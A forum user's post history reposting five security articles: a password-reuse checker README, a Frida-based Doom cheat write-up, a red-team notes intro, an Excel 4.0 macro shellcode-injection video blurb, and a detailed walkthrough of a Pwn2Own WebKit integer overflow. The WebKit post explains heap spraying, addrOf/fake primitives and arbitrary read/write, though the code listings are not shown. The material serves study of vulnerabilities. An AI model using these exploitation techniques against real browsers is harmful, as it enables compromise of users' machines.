Jump to content

Nytro

Administrators
  • Posts

    18731
  • Joined

  • Last visited

  • Days Won

    708

Everything posted by Nytro

  1. PAF Credentials Checker PCC's aim is to provide a high performing offline tool to easily assess which users are vulnerable to Password Reuse Attacks (a.k.a. Password Stuffing). The output of this tool is usually used to communicate with the vulnerable users to force them to change their password to one that has not leaked online. Features Highlights Only checks the password of internal users matching the IDs in external lists Highly parallel checking of credentials (defaults to 30 goroutines) Supports mixed internal hashing functions, useful if you have multiple hashing schemes Easy to extend and add your own internal hashing schemes Getting Started If you have a working Go environment, building the tool after cloning this repository should be as easy as running: go build The tool can be then launched using this command: ./paf-credentials-checker -creds credentials.txt -outfile cracked.txt leak1.txt [leak2.txt [leakN.txt ...]] You can find some test cases in the test_files directory. The different files on the command line are: credentials.txt contains your internal credentials, with one record per line following this syntax internalID0:InternalID1:mappingID:hashtype:hash:[salt[:salt[:...]] internalID0 and internalID1 are internal identifiers that will be written to the output file. mappingID is an ID that will be used to map the internal user to the external passwords lists hashtype is the short hash type that corresponds to the hashing function that should be used to parse the hash and salts and to check the credentials hash and salts, in the format required by the checking and extracting functions cracked.txt is a csv file in which each password reuse match will appear as a row containing the internalID0,internalID1 of the matched user. This file is being written live, so it will contain duplicates if your leak files contain duplicates. leak.txt is a file in the usual combo list format: mappingID:password Note: Usually the mappingID in the combo lists are usernames, emails or others fields containings PIIs. To avoid processing and storing those extremely sensitive information, a script is available in the importer directory to recreate combo lists files and change the mappingID with a heavily truncated md5 sum (by default first 6 characters of the hex output). Applying the same function to your internal mappingID will allow the matching logic to continue working. Please note that using a truncated hash that short will likely create some false positives (e.g. an internal user being matched to an external one that is not the same), but: this is expected, we want collisions to happen to limit the sensitivity of the information if there is a full false positive (e.g. an internal user matched to another external one that somehow had the same password), then the internal user probably used an extremely common password. Therefore it's not a bad idea to also ask him to change his password... Supported hashing functions In this initial release, only two functions are implemented to showcase the different functionalities. Short ID Verbose ID Function MD5 MD5RAW md5(password) MD5spSHA1sp MD5SaltPreSHA1SaltPre md5(salt1.UPPER(HEX(sha1(salt2.password)))) Adding a new hashing function Here is a todo list to add a new hashing function: Decide on a Short ID, used in your internal credentials file, and a Verbose ID, only used within the tool. Add the Verbose ID to the const list line 14 in credentialChecker.go Add a case in the detectHash function in extractHash.go to map the Short ID to the Verbose ID Create your extraction function in extractHash.go. The purpose of the extraction function is to parse the line from the internal credentials file from the hashtype field until the end and to create a new Hash object containing the proper hashtype (Verbose ID), hash and salts values. Add a case extractTokens function to map your Verbose ID with your new extraction function. Create your checking function in checkHash.go. The purpose of this function is to check a clear text password against the Hash object that was extracted in the previous step. Add a case with the Verbose ID in the function crackHash function in credentialChecker.go to map it to your new checking function Add new unit tests to verify that your extraction and checking functions are working accordingly Motivation While comparing users's passwords against known weak passwords is a best practice, using a massive list containing all the leaked passwords is both impractical if you have a lot of users and a strong hashing function, and also really bad from a user experience point of view as they will struggle to find a password that didn't appear in any breaches. However, relying on a more realistic blacklist of around 10.000 passwords will protect the users against attacker spraying bad passwords at scale but it will not help them in case they are reusing their password on another website that has suffered a breach. In this scenario, an attacker would just need to get those credentials from this third party website leak and test them on your website. If the user used the same password on both services, even if it was a strong password, his account would be at immediate risk of compromise. This attack scenario, called Password Stuffing or Password Reuse Attack has been trendy for several years as more and more massive data leaks are happening. This tool's aim is to fill this gap by allowing you to: Flag accounts that have been reusing the same set of credentials internally and on leaked websites Easily extend the tool to implement your own internal hashing function This tool maps IDs from the internal list with IDs in the external lists to only check credentials belonging to internal users for password reuse to avoid the pitfalls mentioned above. It is also highly parallel thanks to Go's goroutines (by default it creates 30 computing threads, tunable in the code). License This project is licensed under the The 3-Clause BSD License - see the LICENSE.md file for details Sursa: https://github.com/kindredgroup/paf-credentials-checker
  2. Hacking doom for fun, health and ammo Reading time ~19 min Posted by leon on 27 November 2019 Categories: Doom, Frida, Games, Reversing, Sensecon 2019, Reverse engineering Remember iddqd and idkfa? Those are two strings were etched into my brain at a very young age where fond memories of playing shareware Doom live. For SenseCon ’19, Lauren and Reino joined me as we dove into some reversing of chocolate-doom with the aim of recreating similar cheats. The results? Well, a video of it is shown below. We managed to get cheats working that would: Increment your ammo instead of decrement it. Increment everyone’s health for the amount it would have gone down for. Yes, you read right, everyone. Toggle cheats just like how they behaved in classic doom. The source code for our cheats live here if you want to play along, or maybe even contribute new ones The setup The original Doom game was released in 1993, built for OSs a little different to what we have today. The chocolate-doom project exists and aims to be as historically correct as possible while still working on modern operating systems. Perfect nostalgia. We downloaded chocolate-doom for Windows from here, extracted and sourced a shareware WAD to use. We also set some rules for our project. The chocolate-doom source code is available, however, we did not want to reference it at all. Once extracted, chocolate-doom.exe was a stripped PE32 executable. This meant that reverse engineering efforts would be a little harder, but that was part of the challenge and learnings we wanted. Using tools such as IDA Freeware, CheatEngine and WindDBG was considered fair game though. However, any patches or binary modifications had to be implemented using Frida, and not by manually patching chocolate-doom.exe. Finding where to start – Windows Sometimes, getting started is the hardest part. We decided to get a bit of a kick start by using CheatEngine to find interesting code paths based on the games UI. First up was finding out what code was responsible for the ammo count. CheatEngine is a memory scanner and debugger that is particularly suited for this task. You can attach to a running process with CheatEngine, and scan the process’ memory to find all instances of a particular value. If our ammo count is currently 49, we can search for all instances of the value 49 in memory. There may however be quite a number of instances of this value within the process’ memory – a scan will often return several. Additionally, not all instances will be related to the ammo count. Searching for the value 49 returns several memory locations To pinpoint exactly the right location, we can can change the value a bit, and then rescan using CheatEngine for any instances of the previously found value that was altered by the same amount. We could do this by shooting the handgun a few times and taking note of by how much the ammo count was changed. We can then use the “Next Scan” function and the “Decreased value by” scan type option to search in CheatEngine for a value that has also changed by the same amount. This decreased the amount of possible locations for the ammo count to only three. Only three possible locations found for the ammo count. At this point all the possible instances could be either the original, or a copy of the original ammo count. We can watch these memory locations to determine which instructions write to them in an attempt to identify the code that is responsible for decreasing the ammo. To do this in CheatEngine, you can simply click right a watched memory location, and select “Find out what writes to this address”. Watching updates to a memory location. When watching the first two locations we identified, we saw instructions rapidly writing to the target pointers even while the game was paused. These instructions also didn’t subtract from the ammo count which meant that these instructions were probably not what we were looking for. A rapid firing instruction on the watched memory location. The third match we had saw writes only when the handgun was fired. The instruction was a subtraction by one and therefore likely the instruction to decrease the ammo count we are interested in. CheatEngine allows you to disassemble code around the identified instruction. Using this, we had the location of the instruction responsible for decreasing the ammo count when the handgun was shot at 0x0430A2c. Instruction to reduce the handgun’s ammo by 1 Finding where to start – Linux While not the primary target for our project, we also had a go at patching the chocolate-doom ELF binary. This was all done on an Ubuntu machine using similar tools as mentioned above, however, cheat engine was not available for Linux. Instead, to start finding interesting code paths in the ELF binary, we used a tool called scanmem which is similar to CheatEngine, but only gives the addresses of a value in memory and not which instruction alters it. After starting up scanmem and entering the changing ammo value a couple of times, it also isolated 3 possible addresses for ammo. These would change at each invocation of chocolate-doom because of the use of ASLR. Scanmem showing the addresses storing the current ammo value. To find out what instructions write to the identified pointers, we used gdb and set a watchpoint on each address found by scanmem. Watch points set for the ammo decrease. We then continued the game and shot once with the handgun to trigger a watchpoint. You can see the old and new ammo value below. Watchpoint triggered after shooting with the handgun. Next was to check where the instruction pointer was and to view the instructions surrounding it to see if we could spot the exact instruction that subtracts one from the ammo value each time a shot is fired. rip and the surrounding instructions As you can see, there is a sub instruction just before where the instruction pointer is currently sitting. To search for the exact instruction in IDA, we viewed the hex value of the instruction in gdb. Viewing the sub instruction in hex Because the below values are little endian, we searched for the opcodes 83 ac 83 a8 in IDA and had the offset location of the instruction responsible for decreasing the ammo count when the handgun was shot, i.e. 0x49F28. Watching functions with Frida With some target offsets at hand, we could start to watch them in real time with Frida. Frida has an Interceptor API, that allows you to “intercept” function calls and execute code as a function prolog or epilog. One also has access to the arguments and the return value using the Interceptor, making it possible to log and if needed, change these values. Given that we know which instructions were writing to memory regions that contained the ammo value for our handgun, we used IDA to analyse the function around the instruction to find the entry point for it. This way we would know which memory address to use with the Interceptor. Entrypoint into the function that affected the handgun’s ammo As you can see in the screenshot above, the function starts at 0x4309f0. With a base of 0x400000 that means that the function’s offset is just 0x309f0 from that (this will be important later). With a known offset, our first Frida script started. This script would simply find the chocolate-doom module’s base address, calculate the offset to the function we are interested in and attach the Interceptor. The Interceptor onEnter callback would then simply log that the function triggered. Interceptor attached to the hangun fire function’s entry point We can see this script in action when attached to chocolate-doom below. Knowing that function triggers as we fire the handgun helps confirm that we are on the right track. Our first cheat We figured we would start by writing a simple patch that just replaces the instruction to decrement the ammo count by 1 with NOP instructions. Frida has a Code writer module that can help with this. The original decrement instruction was sub dword ptr [ebx+edx*4+0A4h], 1 which is represented as 8 opcodes when viewed in hex. Hex opcodes for the instruction decrementing ammo of the handgun The code writer could be used to patch 0x430a2c with exactly 8 NOP instructions using the putNopPadding(8) method on a code writer instance. Frida code writer used to replace the ammo decrementing instructions with 8 NOPs. Applying this patch meant that we no longer ran out of ammo with the handgun. Improving the first ammo cheat To test how effective our NOP-based cheat was, we used one of the original cheats (“idkfa”) to get all of the available guns and ammo and see if it worked for those as well. Turns out, it didn’t, and some investigation revealed that each gun had its own ammo decrementing function. All functions eventually called an opcode that would SUB 0x1 from an ammo total (except for the machine gun that would SUB 0x2). An improvement was necessary. We didn’t want to hardcode all of the instructions we found and looked for other options. When searching in IDA for the opcodes 0x83 0xac (part of the ammo SUB opcodes for sub dword ptr [ebx+edx*4+0A4h], 1), we noticed that the only matches were those that formed part of functions that decremented ammo. Frida has a memory scanner that we could use to match the locations of these functions that we were interested in dynamically (as 0x83 0xac), available as Memory.scanSync(). We then used the same Memory.patchCode() function to simply override the opcodes to ADD instead of SUB as a simple two-byte patch Ammo patcher to increment instead of decrement ammo for each matched opcode search This patch was a little more generic and did not require any hardcoded offsets to work. Depending on what you are working with, a better search may be to use some of the wildcarding features of Memory.scanSync() so that you can have much more specific matches. With our patch applied, all weapons now incremented their ammo count as you fired. Writing a health cheat After fiddling with ammo related routines, we changed our focus to health. We used the same CheatEngine technique as before to figure out where our health was being stored and who was writing to those locations. Finding the health locations however turned out to be a bit more tricky, as around four to five different locations would appear between different searches. Some of these locations had rapid firing instructions executing writes on them, as before with the ammo count, and were thus ignored. Around three locations had instructions which triggered when the player’s health decreased. The locations for the player’s health. The instructions were however not sub instructions, but rather mov instructions. Looking at the disassembled code, we could however spot the sub instruction a few lines higher up. One of the set of instructions that triggered when a player’s health decreased. Note the sub instruction above the mov instruction, that did the actual subtraction. What is important to note is that instruction was a subtraction between two registers, i.e. sub eax, esi. This is a fairly common instruction, and meant that we can’t just scan for all instances of it in memory and replace it with an add instruction like we did with the ammo increment patch. Instead, we manually went to the location of each of the sub instructions, and changed it to an add instruction. When viewed as opcodes, sub eax, esi is 0x29 0xF0, while add eax, esi is 0x01 0xF0. So, a patch was simply a case of swapping out the 0x29 for a 0x01. The sub instructions for the three different functions were at 0x3DEEC, 0x2C385, and 0x2c39. Patching 0x3DEEC however often caused the game to crash, so it was removed later on. Patching 0x2C385, and especially 0x2c39 made the player’s health increase when attacked. It however also has the side effect of making all monster’s health increase as well when they are attacked – this might be because both the player and monsters in the game use the same logic for health deduction. ¯\_(?)_/¯ Health patch to ADD instead of SUB With this patch applied, the incrementing health cheat could be seen in the following video. Making our patches, cheats – static analysis Up to now we have been patching chocolate-doom for our cheats as soon as Frida was injected and our scripts were run. We really wanted to make our cheats behave like the originals did by simply typing them in the game, “iddqd” and “idkfa” style. To implement this the chocolate-doom binary was analysed to find the logic that handles the current cheats. We knew that if you typed “idkfa”, the game would pop up a message saying “VERY HAPPY AMMO ADDED”. Message after using the idkfa cheat A text search in IDA for this message revealed the location where it was used. Very Happy Ammo Added search in IDA We focussed on the function this reference was in and realised that it was an incredibly long function. In fact, it appeared as though all of the cheats were processed by this single function, with a bunch of branches for each cheat. Code paths could be seen in the IDA graph view and gave us a reasonable idea of its complexity. IDA graph view of the cheat function All of the different cheats branches also made a call to a function that lived at 0x040FE90. This function took two arguments, one being a character array and another an integer and appeared to be comparing a character to a string. Comparison function called for each cheat in the previous routine. Making our patches, cheats – dynamic analysis We decided to have a look at the invocation of this cheat comparison function (henceforth called cheat_compare) at runtime, dumping the arguments it receives. Just like we have previously used the Frida Interceptor to attach to a function, we simply calculate the offset for cheat_compare and log the arguments it receives. This will also give us an opportunity to try and discover how to trigger this function in game. From IDA we knew the first argument was a character array, so we just dumped the raw string using the readCString() Frida method for that. For the second argument we weren’t entirely sure what that would have been, and left it raw for now. Argument dumping using the Frida Interceptor for cheat_compare With this script hooked, the results were rather… surprising… Every keypress the game received appeared to enter the identified compare function we called cheat_compare. Even arrow keys! In the video demo above, we slowly entered the cheat “iddqd”, where you can see many of the possible cheats Doom has being compared to the hex value of the ASCII character we entered. Once the cheat matched, we moved Doom guy left a few times using an arrow key, which is where values such as 0xffffffac entered the routine for a bunch of possible cheats too. Without understanding the full cheat routine, we were sure these would never match something legitimate, so we suspected we may have found an optimisation opportunity here Making our patches, cheats – implementation The two arguments cheat_compare was receiving was enough for us to start building our own implementation. In fact, receiving the keycodes entered was all we needed. We could have gone and tried to patch the original routine to match some new strings and trigger our patches, but instead we chose an easier way out. We can read the keycodes that cheat_compare received, perform some tests for our cheats and then let the original function continue as normal. Herein lies an important concept I suspect many don’t immediately realise when using Frida. While Frida is a fantastic runtime instrumentation library, it can also be used to easily execute some JavaScript logic from within any function. In other words, we can introduce and execute code that was *not* part of the original binary, from within that binary. We don’t have to patch some code to jump to opcodes we have wrote, no, we can just execute pure JavaScript. The cheat_compare method, admittedly, was a little confusing. We decided to use the keycode we got as an argument, but had to work around the fact that we would receive the same keycode a number of times as the method was repeatedly called for different cheats with the same keycode. As a result, we decided on simply recording unique keycodes . This introduced only one limitation; our cheats couldn’t have repeating characters. The result was a method that would check a character and append it if it was unique, returning the full recorded buffer if a new character was added. Method used to record keycodes received in cheat_compare() Next, we attached to cheat_compare and fired this new getCheatFromBufWithChar() to get the buffer of characters that were entered thus far. If a buffer ended with one of our strings, we fired the relevant patch to activate the cheat! To optimise the routine a little, we exited early if the entered keycode was not in the ASCII printable range. cheat_compare entrypoint used to match new, custom cheats The result of this script meant that any unique ascii characters that were read would be compared to toggle the status of a cheat. This also meant that we had to write smaller routines that would undo the patches we wrote, but those were relatively easy as we already knew the offsets and original opcodes. The final script to play with these cheats is available here. Conclusion While choosing Doom may have been an easy target, we learnt a lot and got to play games while at it! We hope this inspires you to dig a little deeper into Frida and experiment more with it. Sursa: https://sensepost.com/blog/2019/hacking-doom-for-fun-health-and-ammo/
  3. What is this? This is publicly accessible personal notes at https://ired.team and https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. {% hint style="warning" %} Do not take everything or anything for granted nor expect the notes to be very detailed or covering the techniques or the artifacts they produce in full and always consult additional resources. {% endhint %} The following sub-pages of this page will explore some of the common offensive security techniques involving gaining code execution, lateral movement, persistence and more. This is my way of learning things - I learn by doing, repeating and taking notes. Most of these techniques are discovered by other security researchers and I do not claim their ownership. I try to reference the sources I use the best I can, but if you think I've missed something, please get in touch and I will fix it immediately. The Goal The goal of this project is simple - read other researchers work, execute some common/uncommon attacking techniques in a lab environment and: understand how the attacks can be performed write code to further the understanding of some of the tools and techniques see what most common artifacts the techniques leave behind try out various industry tools and become more profficient in using them take notes for future reference Social Follow me on twitter: {% embed url="https://twitter.com/spotheplanet" %} Sursa: https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques
      • 1
      • Thanks
  4. Colin Hardy Here I describe how you can analyse a very stealthy technique to execute shellcode via Process Injection from an old-skool Excel Macro technique, known as Excel 4.0 Macros. This seems to be a technique favoured by many APT's and Red Teams given the lack of detection by lots of anti-malware technology. The sample attempts to inject shellcode which transpires to be a Cobalt Strike beacon which uses Domain Fronting to access its C2. The sample was provided by Arti Karahoda, definitely give him a follow: https://twitter.com/w1zzcap The sample can be obtained from here: https://app.any.run/tasks/e8db83aa-89... Also, I mention a few resources in the video, as follows: https://outflank.nl/blog/2018/10/06/o... https://d13ot9o61jdzpp.cloudfront.net... http://www.hexacorn.com/blog/2015/12/... Thanks for the sample Arti! Hope you all like the video and the techniques used and hopefully this will help protect you in your own environments. If you liked the video, hit the thumbs up. If you loved it, please subscribe. Find Me: https://twitter.com/cybercdh https://colin.guru Thanks! Colin
  5. Diving Deep Into a Pwn2Own Winning WebKit Bug November 26, 2019 | Ziad Badawi SUBSCRIBE Pwn2Own Tokyo just completed, and it got me thinking about a WebKit bug used by the team of Fluoroacetate (Amat Cama and Richard Zhu) at this year’s Pwn2Own in Vancouver. It was a part of the chain that earned them $55,000 and was a nifty piece of work. Since the holidays are coming up, I thought it would be a great time to do a deep dive into the bug and show the process I used for verifying their discovery. Let’s start with the PoC: First of all, we need to compile the affected WebKit version which was Safari version 12.0.3 at the time of the springtime Pwn2Own 2019 contest. According to Apple's releases, this translates to revision 240322. svn checkout -r 240322 https://svn.webkit.org/repository/webkit/trunk webkit_ga_asan Let's compile it with AddressSanitizer (ASAN). This will allow us to detect memory corruption as soon as it happens. ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/set-webkit-configuration --asan ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/build-webkit # --jsc-only can be used here which should be enough We are going to use lldb for debugging because it is already included with macOS. As the POC does not include any rendering code, we can execute it using JavaScriptCore (JSC) only in lldb. For jsc to be executed in lldb, its binary file needs to be called instead of the script run-jsc. This file is available in WebKitBuild/Release/jsc and an environment variable is required for it to run correctly. I should point out that: env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release can be run within lldb, but placing it in a text file and passing that to lldb -s is the preferred method. ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release r Let’s start debugging. It crashes at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8, which appears to be an out-of-bounds write. The stack trace shows that this occurs in the VM, meaning in compiled or JIT’ed code. We also notice that rsi, used as the index, contains 0x20000040. We have seen that number before in the POC. It is the size of bigarr! (minus one), which is essentially NUM_SPREAD_ARGS * sizeof(a). In order to see the JITed code, we can set the JSC_dumpDFGDisassembly environment variable so jsc can dump compiled code in DFG and FTL. ZDIs-Mac:webkit_ga_asan zdi$ JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js This will dump a lot of extraneous assembly. So, how are we going to pinpoint relevant code? We know that the crash happens at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8. Why don’t we try searching for that address? It might lead to something relevant. Bingo! Right in the DFG. The NewArrayWithSpread is called when creating a new array using the spread operator ... in the DFG JIT tier. This occurs in function f that is generated by gen_func and called in a loop. The main reason for iterating ITERS times in f is to make that part of the code hot, causing it to be optimized by the DFG JIT tier. Digging through the source code, we find the function SpeculativeJIT::compileNewArrayWithSpread in Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp. This is where DFG emits code. Emitting code means writing the JIT-produced machine code into memory for later execution. We can understand that machine code by taking a look at compileNewArrayWithSpread. We see compileAllocateNewArrayWithSize() is responsible for allocating a new array with a certain size. Its third parameter, sizeGPR, is passed to emitAllocateButterfly() as its second argument, which means it will handle allocating a new butterfly, memory space containing values of a JS object, for the array. If you aren’t familiar with the butterfly of JSObject, more info may be found here. Jumping to emitAllocateButterfly(), we see that the size parameter sizeGPR is shifted 3 bits to the left (multiplied by 😎 and then added to the constant sizeof(IndexingHeader). To make things simpler, we need to match the actual machine code to the C++ code we have in this function. The m_jit field is of type JITCompiler. DFG::JITCompiler is responsible for generating JIT code from the dataflow graph. It does so by delegating to the speculative & non-speculative JITs, which generate to a MacroAssembler (which the JITCompiler owns through an inheritance relationship). The JITCompiler holds references to information required during compilation, and also records information used in linking (e.g. a list of all calls to be linked). This means the calls you see, such as m_jit.move(), m_jit.add32(), etc., are functions that emit assembly. By tracking each one we will be able to match it with its C++ counterpart. We configure lldb with our preference of Intel assembly, in addition to the malloc debugging feature for tracking memory allocations. ZDIs-Mac:~ zdi$ cat ~/.lldbinit settings set target.x86-disassembly-flavor intel type format add --format hex long type format add --format hex "unsigned long" command script import lldb.macosx.heap settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib settings set target.env-vars MallocStackLogging=1 settings set target.env-vars MallocScribble=1 Because a large size is being allocated with Guard Malloc enabled, we need to set another environment variable that will allow such allocation. ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release env MALLOC_PERMIT_INSANE_REQUESTS=1 r JSC_dumpDFGDisassembly will dump assembly in AT&T format, so we run disassemble -s 0x6400042d1c22 -c 70 to get it in Intel flavor which will end up as the following: Let us try to match some code from emitAllocateButterfly(). Looking at the assembly listing, we can match the following: It is time to see what the machine code is trying to do. We need to set breakpoint there and see what is going on. To do that, we added a dbg() function to jsc.cpp before compilation. This will help a lot in breaking into JS code whenever we want. The compiler complained that exec in the EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec) function was not used, so it failed. To go around that, we just added exec->argumentCount(); which should not affect execution. Let’s add dbg() here, because the actual NewArrayWithSpread function will be executed during the creation of bigarr. Running JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js again will dump the assembly and stop at: This breaks exactly before the creation of bigarr, and you can see the machine code for NewArrayWithSpread. Let us put a breakpoint on the start of the function and continue execution. The breakpoint is hit! Before stepping through, let’s talk a little about what a JS object looks like in memory. describe() is a nice little function that only runs in jsc. It shows us where a JS object is located in memory, its type, and a bit more, as displayed below: Notice above how the arr_dbl object changes types from ArrayWithDouble to ArrayWithContiguous after adding an object. This is because its structure changed, it no longer stores only double values but multiple types. A JS object is represented in memory as follows: Let’s start with the arr array in the example above. By dumping the object address 0x1034b4320, we see above two quadwords. The first is a JSCell and the second is the butterfly pointer. The JSCell consists of -- StructureID m_structureID; # e.g. 0x5f (95) in the first quadword of arr object. (4 bytes) -- IndexingType m_indexingTypeAndMisc; # 0x05 (1 byte) -- JSType m_type; # 0x21 (1 byte) -- TypeInfo::InlineTypeFlags m_flags; # 0x8 (1 byte) -- CellState m_cellState; # 0x1 (1 byte) The butterfly pointer points to the actual elements within the array. The values 1,2,3,4,6 are shown here starting with 0xffff as this is how integers are represented in memory as a JSValue. If we go back 0x10 bytes, we see the array length, which is 5. Some objects do not have a butterfly, so their pointer is null or 0 as shown below. Their properties will be stored inline as displayed. This script will help for double-to-memory address conversion and vice versa. This was a short intro but for more information and details on structures, butterflies, properties, boxing, unboxing and JS objects, check Saelo’s awesome article and talk. In addition to that, check out LiveOverflow's great series on WebKit. Let’s continue stepping through the breakpoint. All right, so, what is going on here? Note this part from the PoC: The mk_arr funtions creates an array with the first argument as size and second argument as elements. The size is (0x20000000 + 0x40) / 8 = 0x4000008, which creates an array with size 0x4000008 and element values of 0x4141414141410000.The i2f function is for converting an integer to a float so that it ends up with the expected value in memory. LiveOverflow explains it well in his WebKit series. Given that, we now know that rcx points to object a’s butterfly - 0x10 because its size is rcx + 8, which makes the butterfly rcx + 0x10. Going through the rest of this code, we see that r8, r10, rdi, r9, rbx, r12, and r13 all point to a copy of object a - eight copies to be specific, and edx keeps adding the sizes of each. Looking at edx, its value becomes 0x20000040. So, what are those eight a copies? And what is the value 0x20000040? Looking back at the PoC: The means f becomes: f creates an array by spreading NUM_SPREAD_ARGS (8) copies of the first argument and a single copy of its second argument. f is called with objects a (8 * 0x04000008) and c (length 1). When NewArrayWithSpread gets called, it makes room for those 8 a’s and 1 c. The last step through shows length of object c, which makes the final edx value 0x20000041. The next step should be the allocation of that length, which happens inside emitAllocateButterfly(). We notice the overflow that occurs at shl r8d, 0x3 where 0x20000041 gets wrapped around to 0x208. The allocation size becomes 0x210 when it gets passed to emitAllocateVariableSized(). The out-of-bounds read access violation we see happens in the following snippet on mov qword ptr [rcx + 8*rsi], r8. What this snippet does is iterate the newly created butterfly backwards with incorrect size 0x20000041 while the real size is 0x210 after the overflow. It then zeros out each element but since the actual size in memory is way smaller than 0x20000041, it reaches an out-of-bounds access violation in the ASAN build. The Primitives This might seem like just an integer overflow, but it is much more than that. When the allocation size wraps around, it becomes smaller than the initial value thus enabling the creation of an undersized butterfly. This would trigger a heap overflow later when data gets written to it, so other arrays in its vicinity will get corrupted. We are planning on doing the following: - Spray a bunch of arrays - Write to bigarr in order to cause a heap overflow that will corrupt sprayed arrays - Use corrupted arrays to achieve read (addrOf) / write (fake) to the heap using fake JS objects The following snippet shows the spray. When f() is called, the integer overflow will trigger when creating a butterfly with length 0x20000041, thus producing an undersized one because of the wraparound. However, 0x20000041 elements will be written nonetheless, leading to a heap overflow. When c is accessed, the defined getter of its first element will set off and fill up the spray array with 0x4000 elements of newly created arrays from the slice() call. The large number of butterflies created in spray and the huge length of bigarr’s butterfly are bound to overlap at some point because of the heap overflow and that butterflies are created in the same memory space. After executing the POC in a non-ASAN release build, we get the following. We notice how the butterfly of one of spray’s objects (that are either spray_arr or spray_arr2) towards the end was overlapped by bigarr. The following might help in visualizing what is going on. It is important to note here the types of spray_arr and spray_arr2 as it is necessary for constructing the exploit primitives. They are ArrayWithDouble and ArrayWithContiguous respectively. This means that an array with type ArrayWithDouble contains non-boxed float values, which means an element is written and read as a native float number. ArrayWithContiguous is different as it treats its elements as boxed JSValues so it reads and writes JS objects. The basic idea is finding a way for writing an object to the ArrayWithContiguous array (spray_arr2) and then reading its memory address from the ArrayWithDouble array (spray_arr). The same is true vice versa where we write a memory address to spray_arr and read it as an object using spray_arr2. In order to do that, we need to get hold of the overlapped space using the two arrays spray_arr and spray_arr2. Let us take a look at the following: This snippet is looping spray, specifically the ArrayWithDouble instances (spray_arr), and breaking when it finds the first overlapped space with bigarr, thus returning its index, oobarr_idx, in spray and a new object, oobarr, pointing to that space. The main condition to satisfy for breaking is spray.length > 0x40 because when spray points to the bigarr data, which consists of 0x4142414141410000. Its length will be located 8 bytes back, which is also 0x4142414141410000. This makes the length be 0x41410000, which is > 0x40. What is oobarr? It is an array of type ArrayWithDouble pointing to the beginning of the overlapped space between spray and bigarr. The oobarr[0] function should return 0x4142414141410000. The oobarr array is the first one we can use in order to read and write object addresses. contarr is an array of type ArrayWithContiguous pointing to a space that is shared with oobarr. Below shows the snippet executed: The following shows both addrOf and fake primitives. The addrOf primitive is used to return an address of any JS object by writing it to the ArrayWithContiguous array and reading it from the ArrayWithDouble array as a float. The fake primitive is the opposite. It is used to create a JS object from a memory address by writing the address to ArrayWithDouble and reading from ArrayWithContiguous. It is clear in the debugger output that both primitives work as expected. The next step is achieving arbitrary read/write by creating a fake object and controlling its butterfly. We know by now that objects store data in their butterfly if they are not inline. This looks like (from Filip Pizlo's talk😞 Check out the following: We create an empty array (length 0) with a single property, p0, containing a string. Its memory layout is shown below. When we go butterfly 0x10, we see the quadwords for length and the first property. Its vector length is 0, while the property points to 0x1034740a0. It should be clear by now that in order to access a property in an object, we get the butterfly then subtract 0x10. What happens if we control the butterfly? Well, arbitrary read and write happens. For any JS object to be valid in memory, its JSCell must be valid as well, and that includes its structure ID. Structure IDs cannot be generated manually, but they are predictable, at least on the build we are working on. Since we are planning on creating a fake object, we need to make sure it has a valid JSCell. The following snippet sprays 0x400 a objects so we can predict a value between 1 and 0x400 for its structure ID. We need to create a victim object that we control. Take a look at the following: mngr is the middle object in struct_spray, and we create victim making sure it resides in the address range after mngr’s address. We are going to use the outer object to create the fake object hax. The first property a is basically going to be the JSCell of the fake object. It will end up as 0x0108200700000200, which means 0x200 is the structure ID we predicted. The - (1<<16) data-preserve-html-node="true" part is just to account for the boxing effect (which adds 2^48) when that value is stored in the object. The b property will be the butterfly of the fake object. To create hax, we get the outer address and then add 0x10 to it. We then feed the result to fake that was created earlier. The object’s layout is shown in lldb output below. When accessing an index of hax, it means we are accessing the memory space starting from mngr’s address shown below. Since objects are located in the same space and victim was created last, it is located after mngr. Subtracting mngr_addr fromvictim_addr, we can reach victim’s JSCell and butterfly (+8) when indexing the result in hax. Let's achieve arbitrary read/write: As we mentioned previously, when accessing victim.p0, its butterfly is fetched then goes backwards 0x10 in order to grab its first property. set_victim_addr sets victim’s butterfly to the value we provide plus 0x10. It is easier to look at it in the debugger. Looking at the dump above, we notice that originally, victim’s butterfly was 0x18014e8028. Later, it became 0x18003e4030, which is actually test’s address plus 0x18. When read64 is called, it is passed test’s address plus 8 since we are trying to read its butterfly. Within set_victim_addr, another 0x10 is added to the address. When victim.p0 is read, its butterfly 0x2042fc058 is fetched, then 0x10 is subtracted. This results in 0x2042fc048, which actually points to test's butterfly. victim.p0 actually fetches the value that is pointed by the property address (0x18003e4030 in this case). Adding an addrOf() to that will get us the actual 0x18003e4030 value. Now we have achieved arbitrary read. Writing is similar as shown in write64 where we write to victim.p0 a value using fake(). Neat, right? Conclusion I hope you have enjoyed this in-depth walkthrough. Bugs that come into the program through Pwn2Own tend to be some of the best we see, and this one is no exception. I also hope you learned a bit about lldb and walking through WebKit looking for bugs. If you find any, you know where to send them. 😀 You can find me on Twitter at @ziadrb, and follow the team for the latest in exploit techniques and security patches. Sursa: https://www.thezdi.com/blog/2019/11/25/diving-deep-into-a-pwn2own-winning-webkit-bug
